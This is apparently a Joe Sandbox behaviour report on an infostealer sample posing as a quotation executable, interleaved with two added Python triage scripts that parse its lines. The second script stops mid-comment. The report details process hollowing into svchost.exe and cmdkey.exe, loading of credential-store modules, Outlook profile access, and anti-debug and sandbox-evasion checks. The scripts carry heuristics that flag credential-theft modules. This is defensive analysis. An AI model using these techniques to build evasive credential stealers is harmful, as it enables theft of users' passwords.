                Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\QUOTATION#050125.exe"
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe | Process created: C:\Windows\SysWOW64\cmdkey.exe "C:\Windows\SysWOW64\cmdkey.exe"
                Source: C:\Windows\SysWOW64\cmdkey.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Section loaded: wsock32.dll
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Section loaded: edgegdi.dll
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: edgegdi.dll
                Source: C:\Windows\SysWOW64\cmdkey.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\cmdkey.exe | Section loaded: edgegdi.dll
                Source: C:\Windows\SysWOW64\cmdkey.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\cmdkey.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\cmdkey.exe | Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\cmdkey.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\cmdkey.exe | Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\cmdkey.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\cmdkey.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\cmdkey.exe | Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\cmdkey.exe | Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\cmdkey.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\cmdkey.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\cmdkey.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\cmdkey.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\cmdkey.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\cmdkey.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\cmdkey.exe | Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\cmdkey.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\cmdkey.exe | Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\cmdkey.exe | Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\cmdkey.exe | Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\cmdkey.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\cmdkey.exe | Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe | Section loaded: wininet.dll
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe | Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe | Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe | Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe | Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe | Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\cmdkey.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
                Source: C:\Windows\SysWOW64\cmdkey.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
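The process-creation, module-load and registry lines above carry the part of this report a responder most wants out of it: the sample starts a SysWOW64 svchost.exe whose command line is the sample's own path, a dropped SwDwSdNMaTt.exe starts cmdkey.exe, and that cmdkey.exe loads winsqlite3.dll, vaultcli.dll and dpapi.dll, opens the Outlook profile key and launches Firefox. The Python below is an added example written for this page; it is not Joe Sandbox code and its rules are not Joe Sandbox signatures. It parses these lines in the text form shown here (the run-together extraction with its "Jump to behavior" link residue, or the delimited form), rebuilds the parent/child chain, and applies five reviewer-chosen heuristics. The sample lines are copied from this report; the browser list, the credential-store module list and the "utilities that never launch a browser" list are assumptions.

```python
"""Triage of Joe Sandbox behaviour lines: process chain, module loads, registry access.

Added example for this page, not Joe Sandbox code. REPORT_LINES are copied from the report
(with the page's "Jump to behavior" link residue kept to show that it is stripped). The
rules below are this reviewer's heuristics, not Joe Sandbox signatures.
"""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass

REPORT_LINES = r"""
Source: unknownProcess created: C:\Users\user\Desktop\QUOTATION#050125.exe "C:\Users\user\Desktop\QUOTATION#050125.exe"
Source: C:\Users\user\Desktop\QUOTATION#050125.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\QUOTATION#050125.exe"Jump to behavior
Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exeProcess created: C:\Windows\SysWOW64\cmdkey.exe "C:\Windows\SysWOW64\cmdkey.exe"
Source: C:\Windows\SysWOW64\cmdkey.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#050125.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: winsqlite3.dllJump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: vaultcli.dllJump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
""".strip().splitlines()

# "Source: <path>" may run straight into the event name or be separated by " | ".
LINE_RE = re.compile(
    r"^Source:\s*(?P<src>.+?)\s*\|?\s*"
    r"(?P<kind>Process created|Section loaded|Key opened):\s*(?P<rest>.+?)\s*$"
)
PROC_RE = re.compile(r'^(?P<image>.+?)\s+"(?P<cmdline>[^"]*)"')  # image path, then quoted argv[0]
RESIDUE_RE = re.compile(r"\s*Jump to behavior\s*$")               # link text left by extraction

BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}  # assumed list
CRED_MODULES = {"winsqlite3.dll", "vaultcli.dll", "dpapi.dll"}          # assumed list
NO_BROWSER_PARENTS = {"cmdkey.exe"}  # assumed: utilities with no business launching a browser


@dataclass(frozen=True)
class Process:
    image: str    # image path the sandbox reports for the new process
    cmdline: str  # quoted argv[0] it was started with
    parent: str   # basename of the creating process ("unknown" for the root)


@dataclass(frozen=True)
class Finding:
    rule: str
    process: str
    detail: str


def basename(path: str) -> str:
    return path.rstrip("\\").rsplit("\\", 1)[-1].lower()


def parse(lines):
    """Return (processes by basename, loaded modules by basename, opened keys by basename)."""
    procs, modules, keys = {}, defaultdict(set), defaultdict(list)
    for raw in lines:
        m = LINE_RE.match(RESIDUE_RE.sub("", raw).strip())
        if not m:
            continue
        src, kind, rest = basename(m["src"]), m["kind"], m["rest"]
        if kind == "Process created":
            pm = PROC_RE.match(rest)
            if pm:  # one Process per image name; the report's repeated lines collapse
                procs[basename(pm["image"])] = Process(pm["image"], pm["cmdline"], src)
        elif kind == "Section loaded":
            modules[src].add(rest.lower())
        else:
            keys[src].append(rest)
    return procs, modules, keys


def ancestry(procs, name):
    """Walk parents upward from `name`: [child, parent, grandparent, ...]."""
    chain = [name]
    while name in procs and procs[name].parent not in chain:
        name = procs[name].parent
        chain.append(name)
    return chain


def triage(lines):
    procs, modules, keys = parse(lines)
    findings = []
    for name, p in procs.items():
        claimed = basename(p.cmdline)
        if claimed != name:  # image and argv[0] disagree: hollowing / injection tell
            findings.append(Finding("image-cmdline-mismatch", name, f"argv[0] claims {claimed}"))
        if name == "svchost.exe" and p.parent != "services.exe":
            findings.append(Finding("svchost-unexpected-parent", name, f"parent is {p.parent}"))
        if p.parent in NO_BROWSER_PARENTS and name in BROWSERS:
            findings.append(Finding("credential-tool-spawns-browser", p.parent, f"launched {name}"))
    for name, mods in modules.items():
        loaded = mods & CRED_MODULES
        if "winsqlite3.dll" in loaded and name not in BROWSERS:  # browser SQLite store reader
            findings.append(Finding("credential-store-access", name, "loaded " + ", ".join(sorted(loaded))))
    for name, opened in keys.items():
        for key in opened:
            if "\\outlook\\profiles" in key.lower() and name != "outlook.exe":
                findings.append(Finding("mail-profile-access", name, key))
    return findings


if __name__ == "__main__":
    for f in triage(REPORT_LINES):
        print(f"{f.rule:32} {f.process:22} {f.detail}")
    print(" <- ".join(ancestry(parse(REPORT_LINES)[0], "firefox.exe")))
```

Run against the lines above it reports five findings: the svchost.exe image/command-line mismatch and its non-services.exe parent, cmdkey.exe launching firefox.exe, cmdkey.exe loading the three credential-store modules, and cmdkey.exe opening the Outlook profile key; the ancestry walk gives firefox.exe <- cmdkey.exe <- swdwsdnmatt.exe and stops there because this section carries no creation line for SwDwSdNMaTt.exe itself. Keyed on image basename, the parser collapses the report's repeated "Process created" lines, which is right for this report but would merge two distinct instances of the same image in a larger one.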
                Source: QUOTATION#050125.exe | Static file information: File size 1755136 > 1048576
                Source: QUOTATION#050125.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: QUOTATION#050125.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: QUOTATION#050125.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: QUOTATION#050125.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: QUOTATION#050125.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: QUOTATION#050125.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: QUOTATION#050125.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: cmdkey.pdbGCTL source: svchost.exe, 00000003.00000003.289243898151.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.289275035878.0000000003200000.00000004.00000020.00020000.00000000.sdmp, SwDwSdNMaTt.exe, 00000005.00000003.292462791821.00000000010DB000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: QUOTATION#050125.exe, 00000002.00000003.288634047789.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, QUOTATION#050125.exe, 00000002.00000003.288633604844.0000000003990000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.289275465830.000000000392D000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.289183129164.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.289275465830.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.289180231245.0000000003400000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000003.289275169587.0000000002DE3000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292817455715.000000000326D000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000003.289279216842.0000000002F91000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292817455715.0000000003140000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: QUOTATION#050125.exe, 00000002.00000003.288634047789.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, QUOTATION#050125.exe, 00000002.00000003.288633604844.0000000003990000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000003.00000002.289275465830.000000000392D000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.289183129164.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.289275465830.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.289180231245.0000000003400000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, cmdkey.exe, 00000006.00000003.289275169587.0000000002DE3000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292817455715.000000000326D000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000003.289279216842.0000000002F91000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292817455715.0000000003140000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: cmdkey.pdb source: svchost.exe, 00000003.00000003.289243898151.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.289275035878.0000000003200000.00000004.00000020.00020000.00000000.sdmp, SwDwSdNMaTt.exe, 00000005.00000003.292462791821.00000000010DB000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: cmdkey.exe, 00000006.00000002.292815481224.0000000000AAD000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.000000000376C000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000000.289344432369.0000000002CCC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000011F5C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: cmdkey.exe, 00000006.00000002.292815481224.0000000000AAD000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.000000000376C000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000000.289344432369.0000000002CCC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000011F5C000.00000004.80000000.00040000.00000000.sdmp
Source: QUOTATION#050125.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: QUOTATION#050125.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: QUOTATION#050125.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: QUOTATION#050125.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: QUOTATION#050125.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_000C42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 2_2_000C42DE
Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_000E0A76 push ecx; ret 2_2_000E0A89
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0040505A push cs; iretd 3_2_00405061
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0040189C push ss; iretd 3_2_004018A8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_004180AB push esp; ret 3_2_004180AC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0040514D push ds; iretd 3_2_00405171
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_00411A63 push ebp; retf 3_2_00411A6D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_00407270 push 0000006Ch; iretd 3_2_0040727B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_00418274 push esp; retf 3_2_00418281
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_00403340 push eax; ret 3_2_00403342
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_004174CC push esp; retf 3_2_004174D6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_004045D4 push esp; iretd 3_2_004045DD
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_00413663 push cs; ret 3_2_00413695
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_00417630 push edi; ret 3_2_0041763A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0040D6A4 push ds; ret 3_2_0040D6B6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_00404F63 push esi; iretd 3_2_00404F66
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038308CD push ecx; mov dword ptr [esp], ecx 3_2_038308D6
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_031421AD pushad ; retf 0004h 6_2_0314223F
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_031708CD push ecx; mov dword ptr [esp], ecx 6_2_031708D6
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_031497A1 push es; iretd 6_2_031497A8
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_0304124E push ebp; ret 6_2_03041250
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_030352B4 push edi; ret 6_2_030352B7
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_03045042 push eax; ret 6_2_03045044
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_0303753D push edx; iretd 6_2_0303753E
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_03036404 push ecx; ret 6_2_03036405
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_030354A5 push esp; iretd 6_2_030354C2
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_03035B8D push FFFFFFC9h; iretd 6_2_03035B96
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_03034BA2 push esp; iretd 6_2_03034BA3
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_0303C9AE push eax; retf 6_2_0303C9B9
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_030348F7 pushad ; iretd 6_2_03034902
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_03034F53 push ss; retf 6_2_03034FCF
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_0303FFF4 push esp; retf 6_2_0303FFF7
Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_000DF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 2_2_000DF98E
Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_00151C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 2_2_00151C41
Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmdkey.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmdkey.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmdkey.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmdkey.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmdkey.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep (graph_2-98853)
Source: C:\Users\user\Desktop\QUOTATION#050125.exe | API/Special instruction interceptor: Address: E1B314
Source: C:\Windows\SysWOW64\cmdkey.exe | API/Special instruction interceptor: Address: 7FFC8254D144
Source: C:\Windows\SysWOW64\cmdkey.exe | API/Special instruction interceptor: Address: 7FFC8254D604
Source: C:\Windows\SysWOW64\cmdkey.exe | API/Special instruction interceptor: Address: 7FFC8254D764
Source: C:\Windows\SysWOW64\cmdkey.exe | API/Special instruction interceptor: Address: 7FFC8254D324
Source: C:\Windows\SysWOW64\cmdkey.exe | API/Special instruction interceptor: Address: 7FFC8254D364
Source: C:\Windows\SysWOW64\cmdkey.exe | API/Special instruction interceptor: Address: 7FFC8254D004
Source: C:\Windows\SysWOW64\cmdkey.exe | API/Special instruction interceptor: Address: 7FFC8254FF74
Source: C:\Windows\SysWOW64\cmdkey.exe | API/Special instruction interceptor: Address: 7FFC8254D864
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0387088E rdtsc 3_2_0387088E
Source: C:\Windows\SysWOW64\cmdkey.exe | Window / User API: threadDelayed 9852
Source: C:\Users\user\Desktop\QUOTATION#050125.exe | API coverage: 3.5 %
Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.7 %
Source: C:\Windows\SysWOW64\cmdkey.exe | API coverage: 1.7 %
Source: C:\Windows\SysWOW64\cmdkey.exe TID: 8012 | Thread sleep count: 121 > 30
Source: C:\Windows\SysWOW64\cmdkey.exe TID: 8012 | Thread sleep time: -242000s >= -30000s
Source: C:\Windows\SysWOW64\cmdkey.exe TID: 8012 | Thread sleep count: 9852 > 30
Source: C:\Windows\SysWOW64\cmdkey.exe TID: 8012 | Thread sleep time: -19704000s >= -30000s
Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe TID: 2512 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\cmdkey.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmdkey.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_000FC2A2 FindFirstFileExW, 2_2_000FC2A2
Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_001368EE FindFirstFileW,FindClose, 2_2_001368EE
Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_0013698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 2_2_0013698F
Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_0012D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 2_2_0012D076
Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_0012D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 2_2_0012D3A9
Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_00139642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 2_2_00139642
Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_0013979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 2_2_0013979D
Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_00139B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 2_2_00139B2B
Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_0012DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 2_2_0012DBBE
Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_00135C97 FindFirstFileW,FindNextFileW,FindClose, 2_2_00135C97
Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_000C42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 2_2_000C42DE
Source: cmdkey.exe, 00000006.00000002.292815481224.0000000000AAD000.00000004.00000020.00020000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293706324420.0000000000DAF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: firefox.exe, 00000008.00000002.289571854198.0000026A51EDD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllii
Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\cmdkey.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0387088E rdtsc 3_2_0387088E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_00417AD3 LdrLoadDll, 3_2_00417AD3
Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_0013EAA2 BlockInput, 2_2_0013EAA2
Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_000F2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_000F2622
Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_000C42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 2_2_000C42DE
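Added example, not part of the Joe Sandbox report or of its tooling: a small Python triage script that reads evasion findings in the form "Source: <column> | <finding>" and condenses them into per-process numbers. The input lines are excerpted from this section of the report (sleep counters, rdtsc, DebugPort and the fs:[00000030h] PEB reads), with the long Program Files (x86) directory shortened to "...". Two things in it are assumptions rather than facts from the page: the sleep-time value is treated as milliseconds (the report prints an "s" suffix, but 19704000 divided by the 9852 calls is exactly 2000, which reads as a Sleep(2000) loop), and the 180-second sandbox run length is a placeholder, since the page does not state the real one. It keeps the per-thread maximum of the sleep counters rather than a sum, because the report restates the same thread's counter at successive checkpoints (121, then 9852 for TID 8012).

```python
import re
from collections import defaultdict

# Constructed input: finding lines excerpted from the "Malware Analysis System
# Evasion" part of this report, reduced to "Source: <column> | <finding>". The
# long "Program Files (x86)\Rvc..." directory is abbreviated with "..." here.
SAMPLE_FINDINGS = r"""
Source: C:\Windows\SysWOW64\cmdkey.exe | Window / User API: threadDelayed 9852
Source: C:\Windows\SysWOW64\cmdkey.exe TID: 8012 | Thread sleep count: 121 > 30
Source: C:\Windows\SysWOW64\cmdkey.exe TID: 8012 | Thread sleep time: -242000s >= -30000s
Source: C:\Windows\SysWOW64\cmdkey.exe TID: 8012 | Thread sleep count: 9852 > 30
Source: C:\Windows\SysWOW64\cmdkey.exe TID: 8012 | Thread sleep time: -19704000s >= -30000s
Source: C:\Program Files (x86)\...\SwDwSdNMaTt.exe TID: 2512 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0387088E rdtsc 3_2_0387088E
Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\cmdkey.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0385A390 mov eax, dword ptr fs:[00000030h] 3_2_0385A390
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038643D0 mov ecx, dword ptr fs:[00000030h] 3_2_038643D0
Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_000E4CE8 mov eax, dword ptr fs:[00000030h] 2_2_000E4CE8
"""

# "Source: <path> [TID: <n>] | <finding>"; the path may contain spaces, so the
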